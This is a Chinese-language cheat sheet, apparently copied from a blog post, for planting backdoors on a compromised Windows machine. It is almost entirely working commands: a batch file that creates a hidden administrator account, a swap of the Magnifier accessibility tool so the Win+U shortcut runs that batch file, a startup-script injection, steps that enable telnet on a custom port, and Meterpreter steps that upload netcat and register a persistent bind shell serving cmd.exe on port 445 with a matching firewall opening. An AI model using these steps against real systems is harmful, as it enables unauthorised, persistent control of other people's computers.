在目标机上安装嗅探工具窃取管理员的密码
构造批处理:
  @echo off
  net user gslw$ test168 /add
  net localgroup administrators gslw$ /add
  %Windir%\system32\nagnify.exe
  exit
转换exe文件:
   battoexe等工具
文件替换:
  @echo off
  copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
  copy %Windir%\system32\magnify.exe nagnify.exe
  replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
  replace.exe %Windir%\magnify.exe %Windir%\system32
  exit
后门利用:
    Win+U启动辅助工具项,打开放大镜即可
    在windows开关机启动脚本中做手脚:
    @echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit 
    远程改端口:“tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168 ”
    在目标机开启:
   tlntadmn config port=2233 //修改 telnet默认端口
   sc config tlntsvr start= auto //设置启动类型为自启动
   net start telnet	//开启telnet服务项
   tlntadmn config sec =passwd //设置密码
   tlntadmn config port = 800	//设置端口
   远程登陆:telnet 192.168.1.9 800  //键入账号密码即可连接
   上传到目标系统:meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
   查看自启:meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
   设置自启:meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe‘
   检查确认:meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
   打开cmd :meterpreter > execute -f cmd -i
   开放445端口:netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
   检查是配置:netsh firewall show portopening
   后门使用:nc -v 172.16.104.128 445
原文:https://www.cnblogs.com/feiyucha/p/9903588.html